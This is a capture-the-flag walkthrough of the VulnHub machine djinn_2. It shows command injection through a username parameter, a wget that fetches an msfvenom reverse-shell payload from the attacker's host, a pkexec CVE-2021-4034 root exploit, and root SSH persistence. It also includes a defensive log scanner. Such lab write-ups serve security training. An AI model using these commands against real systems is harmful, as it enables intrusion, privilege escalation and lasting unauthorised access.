Write Up djinn_2 VulnHub

Port scan

nmap -p- --min-rate 5000 -sV <IP>

Info:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-02 10:37 EDT
Nmap scan report for 192.168.5.163
Host is up (0.00034s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.5.162
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              14 Jan 12  2020 creds.txt
| -rw-r--r--    1 0        0             280 Jan 19  2020 game.txt
|_-rw-r--r--    1 0        0             275 Jan 19  2020 message.txt
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 22:3c:7f:28:79:44:01:ca:55:d2:48:6d:06:5d:cd:ac (RSA)
|   256 71:e4:82:a4:95:30:a0:47:d5:14:fe:3b:c0:10:6c:d8 (ECDSA)
|_  256 ce:77:48:33:be:27:98:4b:5e:4d:62:2f:a3:33:43:a7 (ED25519)
1337/tcp open  waste?
| fingerprint-strings: 
|   GenericLines: 
|     ____ _____ _ 
|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ 
|     \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
|     @0xmzfr, Thanks for hiring me.
|     Since I know how much you like to play game. I'm adding another game in this.
|     Math game
|     Catch em all
|     Exit
|     Stop acting like a hacker for a damn minute!!
|   NULL: 
|     ____ _____ _ 
|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ 
|     \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
|     @0xmzfr, Thanks for hiring me.
|     Since I know how much you like to play game. I'm adding another game in this.
|     Math game
|     Catch em all
|_    Exit
5000/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-title: 405 Method Not Allowed
|_http-server-header: Werkzeug/0.16.0 Python/3.6.9
7331/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-title: Lost in space
|_http-server-header: Werkzeug/0.16.0 Python/3.6.9
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:0C:29:D0:F2:64 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 192.168.5.163

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.63 seconds

ftp

ftp anonymous@<IP>
get creds.txt

get game.txt

get message.txt

Each file contains the following...

creds.txt

nitu:7846A$56

game.txt

@0xmzfr I would like to thank you for hiring me. I won't disappoint you like SAM.
Also I've started implementing the secure way of authorizing the access to our 
network. I have provided @nitish81299 with the beta version of the key fob
hopes everything would be good.

- @Ugtan_

message.txt

@nitish81299, you and sam messed it all up. I've fired sam for all the fuzz he created and 
this will be your last warning if you won't put your shit together than you'll be gone as well.
I've hired @Ugtan_ as our new security head, hope  he'll do something good.

- @0xmzfr

Port 1337

If we open this port in a web browser, we find the following page...

  ____                        _____ _                
 / ___| __ _ _ __ ___   ___  |_   _(_)_ __ ___   ___ 
| |  _ / _` | '_ ` _ \ / _ \   | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | |  __/   | | | | | | | | |  __/
 \____|\__,_|_| |_| |_|\___|   |_| |_|_| |_| |_|\___|
                                                     

Hey @0xmzfr, Thanks for hiring me.
Since I know how much you like to play game. I'm adding another game in this.
1. Math game
2. Catch em all
3. Exit
> Stop acting like a hacker for a damn minute!!

But if we connect like this...

nc <IP> 1337

Info:

  ____                        _____ _                
 / ___| __ _ _ __ ___   ___  |_   _(_)_ __ ___   ___ 
| |  _ / _` | '_ ` _ \ / _ \   | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | |  __/   | | | | | | | | |  __/
 \____|\__,_|_| |_| |_|\___|   |_| |_|_| |_| |_|\___|
                                                     

Hey @0xmzfr, Thanks for hiring me.
Since I know how much you like to play game. I'm adding another game in this.
1. Math game
2. Catch em all
3. Exit
> 

It looks like a game...

If we finish the math game, it tells us the following...

> 1
I see you wanna do some Mathematics. I think you know the rule
Let's start then
4 + 1
> 5
9 + 3
> 12
Look up at the stars and not down at your feet. Try to make sense of what you see, and wonder about what makes the universe exist. Be curious.

-- Stephen (not morris)

Port 5000

If we do the following...

curl -I -X GET http://<IP>:5000

Info:

HTTP/1.0 405 METHOD NOT ALLOWED
Content-Type: text/html
Allow: POST, OPTIONS
Content-Length: 178
Server: Werkzeug/0.16.0 Python/3.6.9
Date: Sun, 02 Jun 2024 14:57:22 GMT

We see that it only accepts POST, so we do the following...

curl -X POST -d "comment=<script>alert('XSS');</script>" http://192.168.5.163:5000

Info:

Access Denied!!

So we gather that there has to be some login somewhere...

Port 7331

If we go to the web page we find an ordinary site, but if we brute-force directories...

gobuster dir -u http://<IP>:7331/ -w <WORDLIST> -x html,php,txt -t 50 -k -r

Info:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.5.163:7331/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/robots.txt           (Status: 200) [Size: 10]
/robots.txt           (Status: 200) [Size: 10]
/source               (Status: 200) [Size: 1280]
/wish                 (Status: 200) [Size: 456]
Progress: 81876 / 81880 (100.00%)
===============================================================
Finished
===============================================================

We find the following; in /robots.txt there is this...

/letshack

Which looks like the URL of a directory...

But if we go to /source, it downloads a file with the following content...

import re
from time import sleep

import requests

URL = "http://{}:5000/?username={}&password={}"


def check_ip(ip: str):
    """
    Check whether the input IP is valid or not
    """
    if re.match(r'^(?:(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])'
                r'(\.(?!$)|$)){4}$', ip):
        return True
    else:
        return False


def catcher(host, username, password):
    try:
        url = URL.format(host, username, password)
        requests.post(url)
        sleep(3)
    except Exception:
        pass

    print("Unable to connect to the server!!")


def main():
    print("If you have this then congratulations on being a part of an awesome organization")
    print("This key will help you in connecting to our system securely.")
    print("If you find any issue please report it to ugtan@djinn.io")

    ip = input('\nIP of the machine: ')
    username = input('Your username: ')
    password = input('Your password: ')

    if ip and check_ip(ip) and username == "REDACTED" and password == "REDACTED":
        print("Verifiying %s with host %s " % (username, ip))
        catcher(ip, username, password)
    else:
        print("Invalid IP address given")


if __name__ == "__main__":
    main()

This looks like a Python login script for port 5000, so we try it with the credentials we found earlier...

mv source source.py
python3 source.py

If we do that and enter the earlier credentials it won't work, so we do the following with this tool...

curl

Following that Python code, we do the following...

curl -X POST 'http://<IP>:5000/?username=ls&password=test'

Info:

app.py

So the command injection worked: the username parameter is executed as a shell command...

We write a Python script that URL-encodes the parameters for us, so we can inject commands and chain several of them...

import urllib.parse

username = "<COMMAND>"
password = "test"

# URL-encode the parameters
encoded_username = urllib.parse.quote(username)
encoded_password = urllib.parse.quote(password)

# Build the encoded URL
url = f"http://<IP>:5000/?username={encoded_username}&password={encoded_password}"

print(url)

If we put cat /etc/passwd where it says <COMMAND> and run it, we get the following...

python3 <SCRIPT_PYTHON>.py

Info:

http://<IP>:5000/?username=cat%20/etc/passwd&password=test

So we send it with curl...

curl -X POST 'http://<IP>:5000/?username=cat%20/etc/passwd&password=test'

Info:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
nitish:x:1000:1000:nitish,,,:/home/nitish:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
ugtan:x:1001:1001:umang taneja,,,:/home/ugtan:/bin/bash
ftp:x:111:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
postfix:x:112:117::/var/spool/postfix:/usr/sbin/nologin

So we see there are 2 users, nitish and ugtan...

What we'll do is build a payload to get a shell through Metasploit, since reverse shells are being sanitized...

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf -o payload.elf

Info:

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
Saved as: payload.elf

We set up Metasploit...

msfconsole -q
#Use the following module
use multi/handler

#Set the payload generated above
set payload linux/x86/shell_reverse_tcp

#Configuration
show options

set LHOST <IP>

set LPORT <PORT>

#Start listening
run

Once we are listening, in another tab we transfer our payload to the victim server using Python's http.server...

python3 -m http.server
curl -X POST 'http://<VICTIM_IP>:5000/?username=wget%20-P%20/tmp/%20http%3A//<YOUR_IP>%3A8000/payload.elf&password=test'

We sent it to the /tmp directory; let's check...

curl -X POST 'http://<IP>:5000/?username=ls%20-la%20/tmp&password=test'

Info:

total 44
drwxrwxrwt 10 root     root     4096 Jun  3 00:38 .
drwxr-xr-x 23 root     root     4096 Dec 21  2019 ..
drwxrwxrwt  2 root     root     4096 Jun  2 20:06 .font-unix
drwxrwxrwt  2 root     root     4096 Jun  2 20:06 .ICE-unix
-rw-r--r--  1 www-data www-data  152 Jun  3 00:29 payload.elf
drwx------  3 root     root     4096 Jun  2 20:06 systemd-private-20399c7c7bf14ecbae4fbc795198fa4a-systemd-resolved.service-uPLypV
drwx------  3 root     root     4096 Jun  2 20:06 systemd-private-20399c7c7bf14ecbae4fbc795198fa4a-systemd-timesyncd.service-1BIRZa
drwxrwxrwt  2 root     root     4096 Jun  2 20:06 .Test-unix
drwx------  2 root     root     4096 Jun  2 23:47 vmware-root
drwxrwxrwt  2 root     root     4096 Jun  2 20:06 .X11-unix
drwxrwxrwt  2 root     root     4096 Jun  2 20:06 .XIM-unix

As we can see it transferred fine; now we do the following to run it...

curl -X POST 'http://<IP>:5000/?username=chmod%20%2Bx%20/tmp/payload.elf&password=test'

We add execute permissions and now run it...

curl -X POST 'http://<IP>:5000/?username=/tmp/payload.elf&password=test'
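Every step above (ls, cat /etc/passwd, wget into /tmp, chmod +x, execution) rides in the username query parameter of a POST to port 5000. As an added defender-side example, not code from the write-up or from the box, the following Python parses Werkzeug-style access log lines (constructed here to mirror the requests above) and flags the ones whose decoded username cannot be a real account name; the allowlist it applies is the check the leaked /source file performs on the IP but never on username or password.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample in Werkzeug's default access-log format (not a real log from
# the box): one legitimate login with the creds.txt user, then the injection chain.
SAMPLE_LOG = """\
192.168.5.162 - - [02/Jun/2024 14:57:22] "GET / HTTP/1.1" 405 -
192.168.5.162 - - [02/Jun/2024 15:01:10] "POST /?username=nitu&password=7846A%2456 HTTP/1.1" 200 -
192.168.5.162 - - [02/Jun/2024 15:05:31] "POST /?username=ls&password=test HTTP/1.1" 200 -
192.168.5.162 - - [02/Jun/2024 15:08:02] "POST /?username=cat%20/etc/passwd&password=test HTTP/1.1" 200 -
192.168.5.162 - - [02/Jun/2024 15:15:44] "POST /?username=wget%20-P%20/tmp/%20http%3A//192.168.5.162%3A8000/payload.elf&password=test HTTP/1.1" 200 -
192.168.5.162 - - [02/Jun/2024 15:17:09] "POST /?username=chmod%20%2Bx%20/tmp/payload.elf&password=test HTTP/1.1" 200 -
192.168.5.162 - - [02/Jun/2024 15:19:20] "POST /?username=/tmp/payload.elf&password=test HTTP/1.1" 200 -
"""

# One Werkzeug access-log line: client - - [timestamp] "METHOD target HTTP/x.y" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d+)'
)

# What a username may look like. The leaked /source validates the IP with a regex
# (check_ip) but passes username and password through untouched; this is the
# equivalent allowlist a hardened endpoint would apply server-side.
USERNAME_RE = re.compile(r'^[A-Za-z0-9_.-]{1,32}$')

# Signals that a "username" is really a shell command line.
SHELL_META = re.compile(r'[;&|`$<>\\]|\s')
KNOWN_BINS = re.compile(r'\b(cat|ls|wget|curl|chmod|sh|bash|nc|python3?)\b')


def is_valid_username(value: str) -> bool:
    """Allowlist check; reject anything that is not a plain account name."""
    return USERNAME_RE.fullmatch(value) is not None


def analyse_request(line: str):
    """Decode the username of one log line and list why it looks injected.

    Returns (ip, method, username, reasons), or None when the line does not
    parse or carries no username parameter (e.g. the bare GET that got a 405).
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_qs(urlsplit(m.group('target')).query, keep_blank_values=True)
    if 'username' not in params:
        return None
    username = params['username'][0]          # parse_qs percent-decodes for us
    reasons = []
    if not is_valid_username(username):
        reasons.append('username fails allowlist')
    if SHELL_META.search(username):
        reasons.append('shell metacharacter or whitespace in username')
    if KNOWN_BINS.search(username):           # weak alone: a user could be called "cat"
        reasons.append('known command name in username')
    if '/tmp/' in username:
        reasons.append('reference to /tmp')
    return m.group('ip'), m.group('method'), username, reasons


def scan_log(lines):
    """Return every request whose decoded username raised at least one reason."""
    hits = []
    for line in lines:
        res = analyse_request(line)
        if res and res[3]:
            hits.append(res)
    return hits


if __name__ == "__main__":
    for ip, method, username, reasons in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} {method} username={username!r}: {', '.join(reasons)}")
```

The legitimate nitu login produces no finding, while the bare ls is caught only by the command-name signal, which is why the allowlist belongs in the endpoint itself rather than only in log review.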

Once that's done, if we go back to Metasploit we will have a connection...

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.5.162:443 
[*] Command shell session 1 opened (192.168.5.162:443 -> 192.168.5.163:46830) at 2024-06-02 15:19:27 -0400

whoami
www-data

We are now the www-data user...

If we do the following...

find / -type f -perm -4000 -ls 2>/dev/null
   285086     80 -rwsr-xr-x   1 root     root        80056 Apr  2  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
   285640    100 -rwsr-sr-x   1 root     root       101208 Apr 16  2018 /usr/lib/snapd/snap-confine
   262612     12 -rwsr-xr-x   1 root     root        10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   287000    428 -rwsr-xr-x   1 root     root       436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
   538740     16 -rwsr-xr-x   1 root     root        14328 Mar 27  2018 /usr/lib/policykit-1/polkit-agent-helper-1
   262602     44 -rwsr-xr--   1 root     messagebus    42992 Nov 16  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   283747     52 -rwsr-sr-x   1 daemon   daemon        51464 Feb 20  2018 /usr/bin/at
   262276     76 -rwsr-xr-x   1 root     root          76496 Jan 25  2018 /usr/bin/chfn
   285442     40 -rwsr-xr-x   1 root     root          37136 Jan 25  2018 /usr/bin/newuidmap
   262491    148 -rwsr-xr-x   1 root     root         149080 Jan 18  2018 /usr/bin/sudo
   285441     40 -rwsr-xr-x   1 root     root          37136 Jan 25  2018 /usr/bin/newgidmap
   262411     60 -rwsr-xr-x   1 root     root          59640 Jan 25  2018 /usr/bin/passwd
   262341     76 -rwsr-xr-x   1 root     root          75824 Jan 25  2018 /usr/bin/gpasswd
   283134     20 -rwsr-xr-x   1 root     root          18448 Mar 10  2017 /usr/bin/traceroute6.iputils
   262400     40 -rwsr-xr-x   1 root     root          40344 Jan 25  2018 /usr/bin/newgrp
   285527     24 -rwsr-xr-x   1 root     root          22520 Mar 27  2018 /usr/bin/pkexec
   262278     44 -rwsr-xr-x   1 root     root          44528 Jan 25  2018 /usr/bin/chsh
   536814     32 -rwsr-xr-x   1 root     root          30800 Aug 11  2016 /bin/fusermount
   536260    144 -rwsr-xr-x   1 root     root         146128 Dec  1  2017 /bin/ntfs-3g
   524358     64 -rwsr-xr-x   1 root     root          64424 Mar 10  2017 /bin/ping
   524376     44 -rwsr-xr-x   1 root     root          44664 Jan 25  2018 /bin/su
   524393     28 -rwsr-xr-x   1 root     root          26696 Mar 16  2018 /bin/umount
   524349     44 -rwsr-xr-x   1 root     root          43088 Mar 16  2018 /bin/mount

Note this line here...

285527     24 -rwsr-xr-x   1 root     root          22520 Mar 27  2018 /usr/bin/pkexec

This binary runs with SUID root permissions, so we do the following...

URL = https://github.com/Almorabea/pkexec-exploit

We bring this to the victim server, either by copying the Python content or transferring it with a command like curl or wget; once it's there...

chmod +x CVE-2021-4034.py
python3 CVE-2021-4034.py

It will seem not to work and get stuck at the prompt to choose n, but if we press ^C, answer n again when asked, and then run whoami, we'll see we are root...

Info:

Do you want to choose a custom payload? y/n (n use default payload)  n
^C
Abort session 1? [y/N]  n
[*] Aborting foreground process in the shell session
sh: 1: : not found
whoami
root
id
uid=0(root) gid=33(www-data) groups=33(www-data)

So we read the flag like this...

./proof.sh

proof.sh (final flag)

TERM environment variable not set.
./proof.sh: line 9: figlet: command not found
djinn-2 pwned...
__________________________________________________________________________

Proof: cHduZWQgZGppbm4tMiBsaWtlIGEgYm9zcwo=
Path: /root
Date: Mon Jun 3 00:59:40 IST 2024
Whoami: root
__________________________________________________________________________

By @0xmzfr

Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)

If you enjoyed this then consider donating (https://mzfr.github.io/donate/)
so I can continue to make these kind of challenges.

And to polish it off, if we want to connect over SSH as root...

passwd root

#Steps
Enter new UNIX password: root
Retype new UNIX password: root
passwd: password updated successfully
echo "PermitRootLogin yes" | sudo tee -a /etc/ssh/sshd_config >/dev/null
sudo systemctl restart sshd

And now we connect over SSH...

ssh root@<IP>

Info:

root@192.168.5.163's password: 
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Jun  3 01:04:26 IST 2024

  System load:  0.03              Processes:           155
  Usage of /:   28.5% of 9.78GB   Users logged in:     1
  Memory usage: 37%               IP address for eth0: 192.168.5.163
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

244 packages can be updated.
136 updates are security updates.

New release '20.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Last login: Sun Jun  2 20:06:21 2024
root@djinn:~#

And now we are root over SSH with a more comfortable shell...
